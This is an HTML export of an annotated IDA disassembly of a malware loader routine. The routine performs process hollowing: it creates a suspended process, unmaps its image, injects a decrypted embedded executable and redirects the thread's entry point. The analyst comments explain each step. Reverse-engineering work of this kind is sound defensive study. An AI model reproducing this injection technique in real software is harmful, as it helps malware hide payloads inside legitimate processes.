<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>[IDA View-A]</title>
</head>
<body bgcolor="white">
<span style="font: Lucida Console; color: blue; background: white">
<pre>
;
; +-------------------------------------------------------------------------+
; |   This file is generated by The Interactive Disassembler (IDA)          |
; |   Copyright (c) 2007 by DataRescue sa/nv, &lt;ida@datarescue.com&gt;          |
; +-------------------------------------------------------------------------+
;
CODE:00402480
CODE:00402480
CODE:00402480 ; =============== S U B R O U T I N E =======================================
CODE:00402480
CODE:00402480 ; Attributes: bp-based frame
CODE:00402480
CODE:00402480 ; int __stdcall launch_image_in_memory(CONTEXT hProcess)
CODE:00402480 launch_image_in_memory proc near        ; CODE XREF: CODE:00402D49p
CODE:00402480
CODE:00402480 hProcess        = CONTEXT ptr -148h
CODE:00402480
CODE:00402480 ; FUNCTION CHUNK AT CODE:00401A3C SIZE 00000036 BYTES
CODE:00402480
CODE:00402480 000                 push    ebp
CODE:00402481 004                 mov     ebp, esp
CODE:00402483 004                 add     esp, 0FFFFFEB8h
CODE:00402489 14C                 push    ebx
CODE:0040248A 150                 push    esi
CODE:0040248B 154                 push    edi
CODE:0040248C 158                 mov     dword ptr [ebp+hProcess.ExtendedRegisters+70h], ecx
CODE:0040248F 158                 mov     dword ptr [ebp+hProcess.ExtendedRegisters+74h], edx
CODE:00402492 158                 mov     dword ptr [ebp+hProcess.ExtendedRegisters+78h], eax ; ExtendedRegisters+0x78 is initialized with a pointer
CODE:00402492                                                                                 ; to the decrypted embedded executable in heap space
CODE:00402495 158                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+74h]
CODE:00402498 158                 call    sub_401EF8
CODE:00402498
CODE:0040249D 158                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+70h]
CODE:004024A0 158                 call    sub_401EF8
CODE:004024A0
CODE:004024A5 158                 xor     eax, eax
CODE:004024A7 158                 push    ebp
CODE:004024A8 15C                 push    offset loc_4026F0
CODE:004024AD 160                 push    dword ptr fs:[eax]
CODE:004024B0 164                 mov     fs:[eax], esp
CODE:004024B3 164                 xor     ebx, ebx
CODE:004024B5
CODE:004024B5 ; init ExtendedRegisters
CODE:004024B5
CODE:004024B5 164                 lea     eax, [ebp+hProcess.ExtendedRegisters+44h]
CODE:004024B8 164                 xor     ecx, ecx
CODE:004024BA 164                 mov     edx, 10h
CODE:004024BF 164                 call    c_memset        ; eax = buffer
CODE:004024BF                                             ; edx = count
CODE:004024BF                                             ; ecx = int
CODE:004024BF
CODE:004024C4 164                 lea     eax, [ebp+hProcess.ExtendedRegisters]
CODE:004024C7 164                 xor     ecx, ecx
CODE:004024C9 164                 mov     edx, 44h
CODE:004024CE 164                 call    c_memset        ; eax = buffer
CODE:004024CE                                             ; edx = count
CODE:004024CE                                             ; ecx = int
CODE:004024CE
CODE:004024D3
CODE:004024D3 ; start copy of its own process (suspended!)
CODE:004024D3
CODE:004024D3 164                 mov     dword ptr [ebp+hProcess.ExtendedRegisters], 44h
CODE:004024DA 164                 xor     eax, eax
CODE:004024DC 164                 mov     al, [ebp+hProcess.ExtendedRegisters+84h]
CODE:004024DF 164                 mov     word ptr [ebp+hProcess.ExtendedRegisters+30h], ax
CODE:004024E3 164                 lea     eax, [ebp+hProcess.ExtendedRegisters+44h] ; +0x44 will contain the pid
CODE:004024E6 164                 push    eax             ; lpProcessInformation
CODE:004024E7 168                 lea     eax, [ebp+hProcess.ExtendedRegisters]
CODE:004024EA 168                 push    eax             ; lpStartupInfo
CODE:004024EB 16C                 push    0               ; lpCurrentDirectory
CODE:004024ED 170                 push    0               ; lpEnvironment
CODE:004024EF 174                 push    CREATE_SUSPENDED ; dwCreationFlags
CODE:004024F1 178                 push    0               ; bInheritHandles
CODE:004024F3 17C                 push    0               ; lpThreadAttributes
CODE:004024F5 180                 push    0               ; lpProcessAttributes
CODE:004024F7 184                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+70h]
CODE:004024FA 184                 call    sanitize_eax
CODE:004024FA
CODE:004024FF 184                 push    eax             ; lpCommandLine
CODE:00402500 188                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+74h]
CODE:00402503 188                 call    sanitize_eax
CODE:00402503
CODE:00402508 188                 push    eax             ; lpApplicationName
CODE:00402509 18C                 call    CreateProcessA
CODE:00402509
CODE:0040250E 164                 test    eax, eax
CODE:00402510 164                 jz      err_createproc
CODE:00402510
CODE:00402516 164                 mov     [ebp+hProcess.ExtendedRegisters+5Bh], 1 ; process_started = true;
CODE:0040251A 164                 xor     eax, eax
CODE:0040251C 164                 push    ebp
CODE:0040251D 168                 push    offset loc_4026CE
CODE:00402522 16C                 push    dword ptr fs:[eax]
CODE:00402525 170                 mov     fs:[eax], esp
CODE:00402528
CODE:00402528 ; fill context structure of the newly created process
CODE:00402528 ; the CONTEXT_INTEGER flag is passed to GetThreadContext()
CODE:00402528 ;
CODE:00402528 ; #define CONTEXT_i386 0x00010000 // this assumes that i386 and
CODE:00402528 ; #define CONTEXT_INTEGER (CONTEXT_i386 | 0x00000002L)
CODE:00402528
CODE:00402528 170                 mov     [ebp+hProcess.ContextFlags], 10002h
CODE:00402532 170                 lea     eax, [ebp+hProcess]
CODE:00402538 170                 push    eax             ; lpContext
CODE:00402539 174                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+48h]
CODE:0040253C 174                 push    eax             ; hThread
CODE:0040253D 178                 call    GetThreadContext
CODE:0040253D
CODE:00402542 170                 test    eax, eax
CODE:00402544 170                 jz      err_ldrfailure
CODE:00402544
CODE:0040254A
CODE:0040254A ; the loader exploits the fact that ebx points
CODE:0040254A ; to the PEB at process start.
CODE:0040254A ; so by getting the DWORD pointed to by ebx+8,
CODE:0040254A ; the loader retrieves the ImageBaseAddress from
CODE:0040254A ; the PEB structure
CODE:0040254A ; (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html)
CODE:0040254A
CODE:0040254A 170                 lea     eax, [ebp+hProcess.ExtendedRegisters+68h]
CODE:0040254D 170                 push    eax             ; lpNumberOfBytesRead
CODE:0040254E 174                 push    4               ; nSize
CODE:00402550 178                 lea     eax, [ebp+hProcess.ExtendedRegisters+6Ch]
CODE:00402553 178                 push    eax             ; lpBuffer
CODE:00402554 17C                 mov     eax, [ebp+hProcess._Ebx]
CODE:0040255A 17C                 add     eax, 8
CODE:0040255D 17C                 push    eax             ; lpBaseAddress
CODE:0040255E 180                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+44h]
CODE:00402561 180                 push    eax             ; hProcess
CODE:00402562 184                 call    ReadProcessMemory
CODE:00402562
CODE:00402567 170                 test    eax, eax
CODE:00402569 170                 jz      err_ldrfailure
CODE:00402569
CODE:0040256F
CODE:0040256F ; the virtual address space starting at the
CODE:0040256F ; imagebase passed to ZwUnmapViewOfSection is
CODE:0040256F ; now being unmapped, which means code/data/etc
CODE:0040256F ; of the loaded process are removed.
CODE:0040256F ; (http://www.osronline.com/ddkx/kmarch/k111_9oaa.htm)
CODE:0040256F
CODE:0040256F 170                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+6Ch]
CODE:00402572 170                 push    eax
CODE:00402573 174                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+44h]
CODE:00402576 174                 push    eax
CODE:00402577 178                 call    ZwUnmapViewOfSection
CODE:00402577
CODE:0040257C 170                 test    eax, eax
CODE:0040257E 170                 jl      err_ldrfailure
CODE:0040257E
CODE:00402584
CODE:00402584 ; check if the embedded executable was successfully decrypted
CODE:00402584 ; (remember? +0x78 contains a pointer to the embedded PE image in memory)
CODE:00402584
CODE:00402584 170                 cmp     dword ptr [ebp+hProcess.ExtendedRegisters+78h], 0
CODE:00402588
CODE:00402588 ; the code below will get the original imagesize
CODE:00402588 ; and imagebase values of the embedded executable
CODE:00402588 ; and use them to allocate a new memory block in
CODE:00402588 ; the process space of the (still suspended) process
CODE:00402588
CODE:00402588 170                 jz      err_ldrfailure
CODE:00402588
CODE:0040258E 170                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+78h]
CODE:00402591 ; get offset to PE header
CODE:00402591 170                 mov     eax, [eax+3Ch]
CODE:00402594 ; add address of decrypted executable and save it
CODE:00402594 ; into the ExtendedRegisters structure
CODE:00402594 170                 add     eax, dword ptr [ebp+hProcess.ExtendedRegisters+78h]
CODE:00402597 170                 mov     dword ptr [ebp+hProcess.ExtendedRegisters+5Ch], eax
CODE:0040259A 170                 push    4               ; flProtect
CODE:0040259C 174                 push    3000h           ; flAllocationType
CODE:004025A1 178                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+5Ch]
CODE:004025A4 ; get image size from PE header
CODE:004025A4 178                 mov     eax, [eax+50h]
CODE:004025A7 178                 push    eax             ; dwSize
CODE:004025A8 17C                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+5Ch]
CODE:004025AB ; get image base from PE header
CODE:004025AB 17C                 mov     eax, [eax+34h]
CODE:004025AE 17C                 push    eax             ; lpAddress
CODE:004025AF 180                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+44h]
CODE:004025B2 180                 push    eax             ; hProcess
CODE:004025B3 184                 call    VirtualAllocEx
CODE:004025B3
CODE:004025B8 170                 mov     dword ptr [ebp+hProcess.ExtendedRegisters+6Ch], eax
CODE:004025BB 170                 cmp     dword ptr [ebp+hProcess.ExtendedRegisters+6Ch], 0
CODE:004025BF 170                 jz      err_ldrfailure
CODE:004025BF
CODE:004025C5
CODE:004025C5 ; write headers of the image
CODE:004025C5
CODE:004025C5 170                 lea     eax, [ebp+hProcess.ExtendedRegisters+64h]
CODE:004025C8 170                 push    eax             ; lpNumberOfBytesWritten
CODE:004025C9 174                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+5Ch] ; ptr to PE header of decrypted executable in memory
CODE:004025CC ; get SizeOfHeaders
CODE:004025CC 174                 mov     eax, [eax+54h]
CODE:004025CF 174                 push    eax             ; nSize
CODE:004025D0 178                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+78h] ; ptr to decrypted image in memory
CODE:004025D3 178                 push    eax             ; lpBuffer
CODE:004025D4 17C                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+6Ch] ; virtual address to write to
CODE:004025D7 17C                 push    eax             ; lpBaseAddress
CODE:004025D8 180                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+44h] ; pid
CODE:004025DB 180                 push    eax             ; hProcess
CODE:004025DC 184                 call    WriteProcessMemory
CODE:004025DC
CODE:004025E1 170                 test    eax, eax
CODE:004025E3 170                 jz      err_ldrfailure
CODE:004025E3
CODE:004025E9 170                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+5Ch]
CODE:004025EC 170                 call    get_address_of_section_table ; in: eax = ptr to PE header
CODE:004025EC
CODE:004025F1 170                 mov     esi, eax
CODE:004025F3 170                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+5Ch]
CODE:004025F6 ; get number of sections
CODE:004025F6 170                 movzx   eax, word ptr [eax+6]
CODE:004025FA 170                 dec     eax
CODE:004025FB 170                 test    eax, eax
CODE:004025FD 170                 jb      short err_no_more_sections
CODE:004025FD
CODE:004025FF 170                 inc     eax
CODE:00402600 170                 mov     dword ptr [ebp+hProcess.ExtendedRegisters+54h], eax ; number of sections to patch into process
CODE:00402603 170                 xor     ebx, ebx
CODE:00402603
CODE:00402605
CODE:00402605 ; copy each section of the embedded executable
CODE:00402605 ; into the process space
CODE:00402605
CODE:00402605
CODE:00402605 insert_section_into_process_space:      ; CODE XREF: launch_image_in_memory+1D6j
CODE:00402605 170                 lea     eax, [ebp+hProcess.ExtendedRegisters+64h]
CODE:00402608 170                 push    eax             ; lpNumberOfBytesWritten
CODE:00402609 174                 lea     edi, [ebx+ebx*4] ; edi = number of current section * 5
CODE:0040260C 174                 mov     eax, [esi+edi*8+10h] ; size of raw data of n-th section
CODE:00402610 174                 push    eax             ; nSize
CODE:00402611 178                 mov     eax, [esi+edi*8+14h] ; pointer to raw data of n-th section
CODE:00402615 178                 add     eax, dword ptr [ebp+hProcess.ExtendedRegisters+78h]
CODE:00402618 178                 push    eax             ; lpBuffer
CODE:00402619 17C                 mov     eax, [esi+edi*8+0Ch] ; virtual address of n-th section
CODE:0040261D 17C                 add     eax, dword ptr [ebp+hProcess.ExtendedRegisters+6Ch]
CODE:00402620 17C                 push    eax             ; lpBaseAddress
CODE:00402621 180                 mov     eax, dword ptr [ebp+hProcess.ExtendedRegisters+44h]
CODE:00402624
</span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:00402625 </span><span style="color:green">184 </span><span style="color:navy">call </span>WriteProcessMemory <span style="color:black">CODE:00402625 </span><span style="color:black">CODE:0040262A </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:0040262C </span><span style="color:green">170 </span><span style="color:navy">jz short </span><span style="color:gray">err_writeprocmem</span> <span style="color:black">CODE:0040262C </span><span style="color:black">CODE:0040262E </span><span style="color:black">CODE:0040262E </span>; convert section characteristics to <span style="color:black">CODE:0040262E </span>; memory protection "characteristics" <span style="color:black">CODE:0040262E </span><span style="color:black">CODE:0040262E </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">60h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402631 </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpflOldProtect <span style="color:black">CODE:00402632 </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">24h</span><span style="color:navy">]</span> ; characteristics of n-th section <span style="color:black">CODE:00402636 </span><span style="color:green">174 </span><span style="color:navy">call </span>convert_section_characteristics_2_memory_protection <span style="color:black">CODE:00402636 </span><span style="color:black">CODE:0040263B </span><span style="color:black">CODE:0040263B </span>; apply memory 
protection "characteristics" <span style="color:black">CODE:0040263B </span><span style="color:black">CODE:0040263B </span><span style="color:green">174 </span><span style="color:navy">push eax</span> ; flNewProtect <span style="color:black">CODE:0040263C </span><span style="color:green">178 </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">8</span><span style="color:navy">]</span> ; virtual size of n-th section <span style="color:black">CODE:00402640 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; dwSize <span style="color:black">CODE:00402641 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">0Ch</span><span style="color:navy">]</span> ; virtual address of n-th section <span style="color:black">CODE:00402645 </span><span style="color:green">17C </span><span style="color:navy">add eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402648 </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpAddress <span style="color:black">CODE:00402649 </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040264C </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:0040264D </span><span style="color:green">184 </span><span style="color:navy">call </span>VirtualProtectEx <span 
style="color:black">CODE:0040264D </span><span style="color:black">CODE:00402652 </span><span style="color:black">CODE:00402652 </span><span style="color:gray">err_writeprocmem</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+1ACj </span><span style="color:black">CODE:00402652 </span><span style="color:green">170 </span><span style="color:navy">inc ebx</span> ; next section <span style="color:black">CODE:00402653 </span><span style="color:green">170 </span><span style="color:navy">dec dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">54h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402656 </span><span style="color:green">170 </span><span style="color:navy">jnz short </span><span style="color:gray">insert_section_into_process_space</span> <span style="color:black">CODE:00402656 </span><span style="color:black">CODE:00402658 </span><span style="color:black">CODE:00402658 </span>; the loader exploits the fact that ebx points <span style="color:black">CODE:00402658 </span>; to the PEB at process start. 
<span style="color:black">CODE:00402658 </span>; so by patching the DWORD pointed to by ebx+8, <span style="color:black">CODE:00402658 </span>; the loader sets a new ImageBaseAddress within <span style="color:black">CODE:00402658 </span>; the PEB structure <span style="color:black">CODE:00402658 </span>; (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html) <span style="color:black">CODE:00402658 </span><span style="color:black">CODE:00402658 </span><span style="color:black">CODE:00402658 </span><span style="color:gray">err_no_more_sections</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+17Dj </span><span style="color:black">CODE:00402658 </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">64h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040265B </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpNumberOfBytesWritten <span style="color:black">CODE:0040265C </span><span style="color:green">174 </span><span style="color:navy">push </span><span style="color:green">4</span> ; nSize <span style="color:black">CODE:0040265E </span><span style="color:green">178 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402661 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; lpBuffer <span style="color:black">CODE:00402662 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, [ebp+</span><span 
style="color:green">hProcess._Ebx</span><span style="color:navy">]</span> <span style="color:black">CODE:00402668 </span><span style="color:green">17C </span><span style="color:navy">add eax</span><span style="color:navy">, </span><span style="color:green">8</span> <span style="color:black">CODE:0040266B </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpBaseAddress <span style="color:black">CODE:0040266C </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040266F </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:00402670 </span><span style="color:green">184 </span><span style="color:navy">call </span>WriteProcessMemory <span style="color:black">CODE:00402670 </span><span style="color:black">CODE:00402675 </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:00402677 </span><span style="color:green">170 </span><span style="color:navy">jz short </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:00402677 </span><span style="color:black">CODE:00402679 </span><span style="color:black">CODE:00402679 </span>; get AddressOfEntrypoint, add address of image <span style="color:black">CODE:00402679 </span>; in memory and set eax of the target process to <span style="color:black">CODE:00402679 </span>; that address <span style="color:black">CODE:00402679 </span><span style="color:black">CODE:00402679 </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span 
style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span> ; PE header <span style="color:black">CODE:0040267C </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, [eax+</span><span style="color:green">28h</span><span style="color:navy">]</span> ; PE header + 0x28 = address of entrypoint <span style="color:black">CODE:0040267F </span><span style="color:green">170 </span><span style="color:navy">add eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402682 </span><span style="color:green">170 </span><span style="color:navy">mov [ebp+</span><span style="color:green">hProcess._Eax</span><span style="color:navy">]</span><span style="color:navy">, eax</span> <span style="color:black">CODE:00402688 </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess</span><span style="color:navy">]</span> <span style="color:black">CODE:0040268E </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpContext <span style="color:black">CODE:0040268F </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">48h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402692 </span><span style="color:green">174 </span><span style="color:navy">push eax</span> ; hThread <span style="color:black">CODE:00402693 </span><span style="color:green">178 </span><span style="color:navy">call </span>SetThreadContext 
<span style="color:black">CODE:00402693 </span><span style="color:black">CODE:00402698 </span><span style="color:green">170 </span><span style="color:navy">cmp eax</span><span style="color:navy">, </span><span style="color:green">1</span> <span style="color:black">CODE:0040269B </span><span style="color:green">170 </span><span style="color:navy">sbb eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:0040269D </span><span style="color:green">170 </span><span style="color:navy">inc eax</span> <span style="color:black">CODE:0040269E </span><span style="color:green">170 </span><span style="color:navy">mov [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Bh</span><span style="color:navy">]</span><span style="color:navy">, al</span> <span style="color:black">CODE:0040269E </span><span style="color:black">CODE:004026A1 </span><span style="color:black">CODE:004026A1 </span><span style="color:gray">err_ldrfailure</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+C4j </span><span style="color:black">CODE:004026A1 </span><span style="color:green">; launch_image_in_memory+E9j ... 
</span><span style="color:black">CODE:004026A1 </span><span style="color:green">170 </span><span style="color:navy">xor eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004026A3 </span><span style="color:green">170 </span><span style="color:navy">pop edx</span> <span style="color:black">CODE:004026A4 </span><span style="color:green">16C </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026A5 </span><span style="color:green">168 </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026A6 </span><span style="color:green">164 </span><span style="color:navy">mov fs:[eax]</span><span style="color:navy">, edx</span> <span style="color:black">CODE:004026A9 </span><span style="color:green">164 </span><span style="color:navy">push offset </span><span style="color:gray">err_createproc</span> <span style="color:black">CODE:004026A9 </span><span style="color:black">CODE:004026AE </span><span style="color:black">CODE:004026AE </span><span style="color:navy">loc_4026AE: </span><span style="color:green">; CODE XREF: launch_image_in_memory+253j </span><span style="color:black">CODE:004026AE </span><span style="color:green">168 </span><span style="color:navy">cmp [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Bh</span><span style="color:navy">]</span><span style="color:navy">, </span><span style="color:green">0</span> <span style="color:black">CODE:004026B2 </span><span style="color:green">168 </span><span style="color:navy">jnz short </span><span style="color:gray">resume_process</span> <span style="color:black">CODE:004026B2 </span><span style="color:black">CODE:004026B4 </span><span style="color:black">CODE:004026B4 </span>; on failure, terminate process <span style="color:black">CODE:004026B4 </span><span style="color:black">CODE:004026B4 </span><span style="color:green">168 </span><span 
style="color:navy">push </span><span style="color:green">0</span> ; uExitCode <span style="color:black">CODE:004026B6 </span><span style="color:green">16C </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:004026B9 </span><span style="color:green">16C </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:004026BA </span><span style="color:green">170 </span><span style="color:navy">call </span>TerminateProcess <span style="color:black">CODE:004026BA </span><span style="color:black">CODE:004026BF </span><span style="color:green">168 </span><span style="color:navy">jmp short loc_4026CA</span> <span style="color:black">CODE:004026BF </span><span style="color:black">CODE:004026C1 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026C1 </span><span style="color:black">CODE:004026C1 </span><span style="color:gray">resume_process</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+232j </span><span style="color:black">CODE:004026C1 </span><span style="color:green">168 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">48h</span><span style="color:navy">]</span> <span style="color:black">CODE:004026C4 </span><span style="color:green">168 </span><span style="color:navy">push eax</span> ; hThread <span style="color:black">CODE:004026C5 </span><span style="color:green">16C </span><span style="color:navy">call </span>ResumeThread <span style="color:black">CODE:004026C5 </span><span 
style="color:black">CODE:004026CA </span><span style="color:black">CODE:004026CA </span><span style="color:navy">loc_4026CA: </span><span style="color:green">; CODE XREF: launch_image_in_memory+23Fj </span><span style="color:black">CODE:004026CA </span><span style="color:green">168 </span><span style="color:navy">mov bl</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Bh</span><span style="color:navy">]</span> <span style="color:black">CODE:004026CD </span><span style="color:green">168 </span><span style="color:navy">retn </span><span style="color:black">CODE:004026CD </span><span style="color:black">CODE:004026CE </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026CE </span><span style="color:black">CODE:004026CE </span><span style="color:navy">loc_4026CE: </span><span style="color:#8080ff">; DATA XREF: launch_image_in_memory+9Do </span><span style="color:black">CODE:004026CE </span><span style="color:green">164 </span><span style="color:navy">jmp loc_401A3C</span> <span style="color:black">CODE:004026CE </span><span style="color:black">CODE:004026D3 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026D3 </span><span style="color:green">164 </span><span style="color:navy">jmp short loc_4026AE</span> <span style="color:black">CODE:004026D3 </span><span style="color:black">CODE:004026D5 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026D5 </span><span style="color:black">CODE:004026D5 </span><span style="color:gray">err_createproc</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+90j </span><span 
style="color:black">CODE:004026D5 </span><span style="color:green">; launch_image_in_memory+24Dj </span><span style="color:black">CODE:004026D5 </span><span style="color:#8080ff">; DATA XREF: ... </span><span style="color:black">CODE:004026D5 </span><span style="color:green">164 </span><span style="color:navy">xor eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004026D7 </span><span style="color:green">164 </span><span style="color:navy">pop edx</span> <span style="color:black">CODE:004026D8 </span><span style="color:green">160 </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026D9 </span><span style="color:green">15C </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026DA </span><span style="color:green">158 </span><span style="color:navy">mov fs:[eax]</span><span style="color:navy">, edx</span> <span style="color:black">CODE:004026DD </span><span style="color:green">158 </span><span style="color:navy">push offset loc_4026F7</span> <span style="color:black">CODE:004026DD </span><span style="color:black">CODE:004026E2 </span><span style="color:black">CODE:004026E2 </span><span style="color:navy">loc_4026E2: </span><span style="color:green">; CODE XREF: launch_image_in_memory+275j </span><span style="color:black">CODE:004026E2 </span><span style="color:green">15C </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">70h</span><span style="color:navy">]</span> <span style="color:black">CODE:004026E5 </span><span style="color:green">15C </span><span style="color:navy">mov edx</span><span style="color:navy">, </span><span style="color:green">2</span> <span style="color:black">CODE:004026EA </span><span style="color:green">15C </span><span style="color:navy">call sub_401C90</span> <span style="color:black">CODE:004026EA 
</span><span style="color:black">CODE:004026EF </span><span style="color:green">15C </span><span style="color:navy">retn </span><span style="color:black">CODE:004026EF </span><span style="color:black">CODE:004026F0 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026F0 </span><span style="color:black">CODE:004026F0 </span><span style="color:navy">loc_4026F0: </span><span style="color:#8080ff">; DATA XREF: launch_image_in_memory+28o </span><span style="color:black">CODE:004026F0 </span><span style="color:green">158 </span><span style="color:navy">jmp loc_401A3C</span> <span style="color:black">CODE:004026F0 </span><span style="color:black">CODE:004026F5 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026F5 </span><span style="color:green">158 </span><span style="color:navy">jmp short loc_4026E2</span> <span style="color:black">CODE:004026F5 </span><span style="color:black">CODE:004026F7 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026F7 </span><span style="color:black">CODE:004026F7 </span><span style="color:navy">loc_4026F7: </span><span style="color:green">; CODE XREF: launch_image_in_memory+26Fj </span><span style="color:black">CODE:004026F7 </span><span style="color:#8080ff">; DATA XREF: launch_image_in_memory+25Do </span><span style="color:black">CODE:004026F7 </span><span style="color:green">15C </span><span style="color:navy">mov eax</span><span style="color:navy">, ebx</span> <span style="color:black">CODE:004026F9 </span><span style="color:green">15C </span><span style="color:navy">pop edi</span> <span style="color:black">CODE:004026FA </span><span style="color:green">158 </span><span style="color:navy">pop esi</span> <span 
